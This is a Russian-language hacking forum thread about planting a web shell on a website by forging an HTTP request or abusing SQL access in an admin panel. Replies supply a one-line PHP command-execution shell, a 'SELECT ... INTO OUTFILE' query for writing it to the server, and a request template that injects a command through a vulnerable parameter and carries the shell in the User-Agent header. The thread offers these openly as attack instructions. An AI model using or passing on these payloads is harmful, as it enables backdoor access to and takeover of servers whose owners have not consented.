Заливка shell при помощи потделки Http запроса

Огрмная просьба , расскажите о этом способе заливки шела по подробнее никак не могу понять как это сделать. Если кто еще умеет через Sql в админке тоже огромная просьба рассказать. Просто другие варианты отпали.

 

Полноценный шелл залит.

 

Подделка HTTP-запроса:
Может тебе поможет софтина RAW HTTP REQUEST (_h0ld-up-team.net.ru). Это прога отправит пакет, который создает на сервере файл и пропишет в него простой php-шелл.
SQL
Создаешь базу с 1 полем, со строкой:

PHP:

<?system($_GET['cmd'])?>

Затем составляешь SQL-запрос:
SELECT <название поля> FROM <Имя таблицы> INTO OUTFILE 'путь к шеллу'
Единственное условие ты должен иметь права на запись в папку, куда собираешься залить шелл.

 

по поводу RAW HTTP REQUEST можно поподробней...как составлять запрос?

 

Примерный запрос

Code:

GET Уязвимый скрипт?Уязвимый параметр=|echo%20$HTTP_USER_AGENT%20>%20путь к шеллу|    
 HTTP/1.1
Host: Уязвимый хост
User-Agent: <? system(GET['cmd']) ?>

 

хы .. можно воспользоваться прогой от отечественного произодителя Antichat
_http://antichat.ru/inetcrack/

 

А вообще есть мануал по разным способам заливки шелла? или их не столь много?

 

Just google it!
попробуй разобраться сам .. больше опыта будет